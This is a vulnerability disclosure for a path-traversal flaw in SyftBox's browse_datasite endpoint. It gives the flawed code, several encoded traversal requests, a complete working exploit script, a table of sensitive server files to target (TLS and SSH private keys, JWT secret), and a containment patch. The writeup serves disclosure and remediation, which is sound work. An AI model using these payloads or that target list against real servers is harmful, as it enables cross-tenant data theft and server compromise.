Summary
An unauthenticated path-traversal vulnerability in SyftBox's browse_datasite endpoint allows any remote attacker to read arbitrary files on the server's filesystem and access private files inside any other user's datasite (cross-tenant confidentiality breach).
The original static analysis flagged files as gated by a small extension allowlist (.html, .md, .json, .yaml, .log, .txt, .py). End-to-end exploitation confirmed that the else fallback at line 126 serves any file via application/octet-stream, meaning there is no effective extension restriction — every readable file on disk is exfiltrable.
The production instance at https://syftbox.openmined.org runs uvicorn directly on 0.0.0.0:8443 with no reverse proxy (confirmed from config/prod/syftbox.service), making it immediately exploitable.
Affected Code
packages/syftbox/syftbox/server/api/v1/main_router.py, lines 88–126:
@main_router.get("/datasites/{path:path}", response_class=HTMLResponse)
async def browse_datasite(
    request: Request,
    path: str,
    server_settings: ServerSettings = Depends(get_server_settings),
) -> HTMLResponse:
    ...
    datasite_part = path.split("/")[0]
    datasites = get_datasites(snapshot_folder)
    if datasite_part in datasites:
        slug = path[len(datasite_part):]
        datasite_path = os.path.join(snapshot_folder, datasite_part)
        datasite_public = datasite_path + "/public"
        ...
        slug_path = os.path.abspath(datasite_public + slug)  # ⚠ no containment check
        if os.path.exists(slug_path) and os.path.isfile(slug_path):
            if slug_path.endswith(".html") or slug_path.endswith(".htm"):
                return FileResponse(slug_path)
            elif slug_path.endswith(".md"):
                ...
            # ... more extension checks ...
            else:
                return FileResponse(slug_path,
                                    media_type="application/octet-stream")  # ⚠ catch-all: ANY file served
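The effect of the missing containment check can be reproduced without SyftBox at all. The following is a minimal sketch that mirrors only the string handling shown above; the `SNAPSHOT` location and the helper name `resolve_like_handler` are assumptions made for illustration, and `posixpath` is used so that the result does not depend on the host operating system.

```python
import posixpath

# Hypothetical snapshot location, chosen only for this illustration.
SNAPSHOT = "/srv/syftbox/snapshot"


def resolve_like_handler(path: str) -> str:
    """Mirror the handler's path arithmetic: split, concatenate, abspath."""
    datasite_part = path.split("/")[0]
    slug = path[len(datasite_part):]
    datasite_public = posixpath.join(SNAPSHOT, datasite_part) + "/public"
    # abspath only collapses ".." segments; it does not verify that the
    # result is still inside datasite_public.
    return posixpath.abspath(datasite_public + slug)


benign = resolve_like_handler("victim@corp.com/index.html")
escaped = resolve_like_handler("victim@corp.com/../private/secrets.yaml")
print(benign)
print(escaped)
```

The second result lands in the `private/` directory even though the string was built from the `public/` prefix, which is why a prefix alone offers no protection.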
Proof of Concept — verified end-to-end
All results come from a fully automated local exploit (exploit_path_traversal.py) run against the real SyftBox code. No production instance was probed.
Attack 1: Cross-tenant private file read (%2e%2e via HTTP)
GET /datasites/victim@corp.com/%2e%2e/private/secrets.yaml HTTP/1.1
→ 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED
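An unauthenticated attacker reads another user's private YAML file. The percent-encoded %2e%2e survives URL normalisation on the way to the handler; once decoded to .., it is appended to <snapshot>/victim@corp.com/public, and os.path.abspath resolves the result to <snapshot>/victim@corp.com/private/secrets.yaml, outside the public/ directory.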
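Why the encoded form matters can be sketched in a few lines. In the example below, `posixpath.normpath` is only a stand-in for any component that collapses dot segments on the raw request path; it is an assumption for illustration and not a claim about what Starlette, uvicorn, or a particular HTTP client does internally.

```python
import posixpath
from urllib.parse import unquote

literal_path = "/datasites/victim@corp.com/../private/secrets.yaml"
encoded_path = "/datasites/victim@corp.com/%2e%2e/private/secrets.yaml"

# A dot-segment normaliser collapses the literal ".." segment ...
normalised_literal = posixpath.normpath(literal_path)
# ... but sees "%2e%2e" as an ordinary segment name and leaves it alone.
normalised_encoded = posixpath.normpath(encoded_path)

# Percent-decoding afterwards reintroduces the ".." segment.
decoded = unquote(normalised_encoded)

print(normalised_literal)
print(normalised_encoded)
print(decoded)
```

Any normalisation applied before percent-decoding therefore cannot be relied on as a defence; the check has to run on the final, resolved filesystem path.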
Attack 2: Escape all datasites — arbitrary server file read
GET /datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt HTTP/1.1
→ 200 OK
→ TOP SECRET SERVER CONFIG
The ..%2F sequences escape the snapshot directory entirely. The file sensitive.txt was placed in the data folder root, simulating server configuration files.
Attack 3: System file read — /etc/passwd
Direct handler call with path: attacker@evil.com/../../../../../../../../../../etc/passwd
→ FileResponse serving /etc/passwd
→ ##
→ # User Database
→ ...
→ nobody:*:-2:-2:Unprivileged User...
Attack 4: Raw socket → real uvicorn (production-equivalent)
Hand-crafted HTTP/1.1 with literal ../ sent to a real uvicorn process:
GET /datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml HTTP/1.1
Host: 127.0.0.1:PORT
Connection: close
→ HTTP/1.1 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED
GET /datasites/attacker@evil.com/[..x10]/etc/passwd HTTP/1.1
→ HTTP/1.1 200 OK
→ ## User Database ...
All four attack vectors succeed with 100% reliability.
Full POC:
import asyncio, os, signal, socket, subprocess, sys, tempfile, time
from pathlib import Path
from unittest.mock import MagicMock

import httpx
from fastapi import FastAPI
from starlette.testclient import TestClient

from syftbox.server.api.v1.main_router import browse_datasite, main_router
from syftbox.server.settings import ServerSettings, get_server_settings

with tempfile.TemporaryDirectory() as tmp:
    # Fixture: one attacker datasite, one victim datasite, one file outside the snapshot
    base = Path(tmp)
    (base / "snapshot/attacker@evil.com/public").mkdir(parents=True)
    (base / "snapshot/attacker@evil.com/public/index.html").write_text("<h1>public</h1>")
    (base / "snapshot/victim@corp.com/public").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private/secrets.yaml").write_text("db_password: hunter2\napi_key: sk-REDACTED")
    (base / "sensitive.txt").write_text("TOP SECRET SERVER CONFIG")

    settings = ServerSettings(data_folder=base)
    app = FastAPI()
    app.include_router(main_router)
    app.dependency_overrides[get_server_settings] = lambda: settings

    # Number of ".." segments needed to climb from public/ to the filesystem root
    depth = len((base / "snapshot/attacker@evil.com/public").resolve().parts) - 1

    print("=" * 60)
    print(" SyftBox Path Traversal PoC")
    print("=" * 60)

    # Stage 1: Starlette TestClient with percent-encoded dots
    c = TestClient(app)
    assert c.get("/datasites/attacker@evil.com/index.html").status_code == 200, "baseline broken"
    print("\n[baseline] OK")

    r = c.get("/datasites/victim@corp.com/%2e%2e/private/secrets.yaml")
    print(f"\n[1] cross-tenant via %2e%2e status={r.status_code}")
    print(f" {r.text}")

    # Stage 2: httpx ASGI transport with percent-encoded slashes
    async def asgi():
        async with httpx.AsyncClient(transport=httpx.ASGITransport(app=app), base_url="http://t") as h:
            r1 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2Fvictim@corp.com%2Fprivate%2Fsecrets.yaml")
            print(f"\n[2] cross-tenant via ..%2F status={r1.status_code}")
            print(f" {r1.text}")
            r2 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt")
            print(f"\n[3] escape datasites via ..%2F status={r2.status_code}")
            print(f" {r2.text}")

    asyncio.run(asgi())

    # Stage 3: call the handler directly with literal "../"
    mock = MagicMock()

    def call(path):
        return asyncio.run(browse_datasite(request=mock, path=path, server_settings=settings))

    def body(result):
        if hasattr(result, "path"):
            return Path(result.path).read_text()
        if hasattr(result, "body"):
            return result.body.decode() if isinstance(result.body, bytes) else str(result.body)
        return str(result)

    r = call("attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[4] direct handler cross-tenant")
    print(f" {body(r)}")

    r = call("attacker@evil.com/../../../sensitive.txt")
    print(f"\n[5] direct handler escape datasites")
    print(f" {body(r)}")

    r = call("attacker@evil.com/" + "/".join([".."] * depth) + "/etc/passwd")
    b = body(r)
    print(f"\n[6] direct handler /etc/passwd")
    print(f" {b[:200]}")

    # Stage 4: real uvicorn process, raw socket with literal "../"
    port = 0
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0)); port = s.getsockname()[1]

    app_py = base / "app.py"
    app_py.write_text(
        f"from fastapi import FastAPI\n"
        f"from syftbox.server.api.v1.main_router import main_router\n"
        f"from syftbox.server.settings import ServerSettings, get_server_settings\n"
        f"settings = ServerSettings(data_folder={str(base)!r})\n"
        f"app = FastAPI()\n"
        f"app.include_router(main_router)\n"
        f"app.dependency_overrides[get_server_settings] = lambda: settings\n"
    )

    proc = subprocess.Popen(
        [sys.executable, "-m", "uvicorn", "app:app",
         "--host", "127.0.0.1", "--port", str(port),
         "--log-level", "warning", "--app-dir", str(base)],
        env={**os.environ, "PYTHONPATH": str(Path(__file__).parent / "packages/syftbox")},
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    )

    # Wait up to 10 seconds for the server to accept connections
    deadline = time.time() + 10
    while time.time() < deadline:
        try:
            socket.create_connection(("127.0.0.1", port), timeout=0.3).close(); break
        except OSError:
            time.sleep(0.2)

    def raw(path):
        s = socket.socket(); s.settimeout(5)
        s.connect(("127.0.0.1", port))
        s.sendall(f"GET {path} HTTP/1.1\r\nHost: 127.0.0.1:{port}\r\nConnection: close\r\n\r\n".encode())
        d = b""
        while True:
            try:
                c = s.recv(4096)
                if not c: break
                d += c
            except socket.timeout: break
        s.close()
        t = d.decode(errors="replace")
        status = t.split("\r\n")[0]
        body = t.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in t else ""
        return status, body

    st, b = raw("/datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[7] raw socket cross-tenant {st}")
    print(f" {b[:200]}")

    st, b = raw("/datasites/attacker@evil.com/../../../sensitive.txt")
    print(f"\n[8] raw socket escape datasites {st}")
    print(f" {b[:200]}")

    st, b = raw(f"/datasites/attacker@evil.com/{'/'.join(['..'] * depth)}/etc/passwd")
    print(f"\n[9] raw socket /etc/passwd {st}")
    print(f" {b[:200]}")

    proc.send_signal(signal.SIGTERM)
    try: proc.wait(timeout=5)
    except subprocess.TimeoutExpired: proc.kill()

    print("\n" + "=" * 60)
Reproduction
cd PySyft/packages/syftbox && pip install -e .
cd ../.. && python3 exploit_path_traversal.py
Impact
Concrete exploitation scenarios on production
| Target file | Traversal | Consequence |
| --- | --- | --- |
| <victim>/private/secrets.yaml | %2e%2e/private/... | Cross-tenant credential theft |
| /etc/letsencrypt/live/syftbox.openmined.org/privkey.pem | Deep ../ | TLS private key → MITM all clients |
| data/file.db | ../../file.db | SQLite database dump → full metadata exfiltration |
| /home/azureuser/.ssh/id_rsa | Deep ../ | SSH key → lateral movement on Azure VM |
| /home/azureuser/.bash_history | Deep ../ | Command history → credential/infra recon |
| server.env / JWT secret on disk | ../../../server.env | JWT forgery → full impersonation |
Remediation
Immediate patch (drop-in replacement for lines 109–126)
from pathlib import Path
from fastapi import HTTPException  # needed if not already imported in main_router.py

# resolve(strict=True) raises FileNotFoundError if the public directory does not exist
datasite_public_real = Path(datasite_public).resolve(strict=True)
candidate = (datasite_public_real / slug.lstrip("/")).resolve()

# Containment: resolved path MUST be inside the public directory
# (Path.is_relative_to requires Python 3.9+)
if not candidate.is_relative_to(datasite_public_real):
    raise HTTPException(status_code=403, detail="Forbidden")
if not candidate.is_file():
    raise HTTPException(status_code=404, detail="Not found")

slug_path = str(candidate)
# ... extension-based Content-Type logic unchanged below ...
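The containment logic can be exercised on its own before it is wired into the handler. The sketch below is a framework-free variant under stated assumptions: the helper name `safe_public_path` is hypothetical, it returns `None` instead of raising `HTTPException` so it runs without FastAPI, and it requires Python 3.9+ for `Path.is_relative_to`.

```python
import tempfile
from pathlib import Path
from typing import Optional


def safe_public_path(datasite_public: str, slug: str) -> Optional[Path]:
    """Return the resolved file only if it lies inside datasite_public."""
    root = Path(datasite_public).resolve(strict=True)
    # resolve() collapses ".." and follows symlinks before the check runs.
    candidate = (root / slug.lstrip("/")).resolve()
    if not candidate.is_relative_to(root):
        return None  # the real handler would answer 403 here
    return candidate if candidate.is_file() else None  # 404 otherwise


with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)
    public = base / "victim@corp.com" / "public"
    private = base / "victim@corp.com" / "private"
    public.mkdir(parents=True)
    private.mkdir()
    (public / "index.html").write_text("<h1>public</h1>")
    (private / "secrets.yaml").write_text("db_password: hunter2")

    allowed = safe_public_path(str(public), "/index.html")
    blocked = safe_public_path(str(public), "/../private/secrets.yaml")
    deep = safe_public_path(str(public), "/" + "../" * 12 + "etc/passwd")
    allowed_name = allowed.name if allowed else None

print(allowed_name, blocked, deep)
```

Checking the resolved path rather than the request string is the design choice that matters here: it applies regardless of how the `..` segments were encoded in transit, and it also rejects symlinks inside `public/` that point elsewhere.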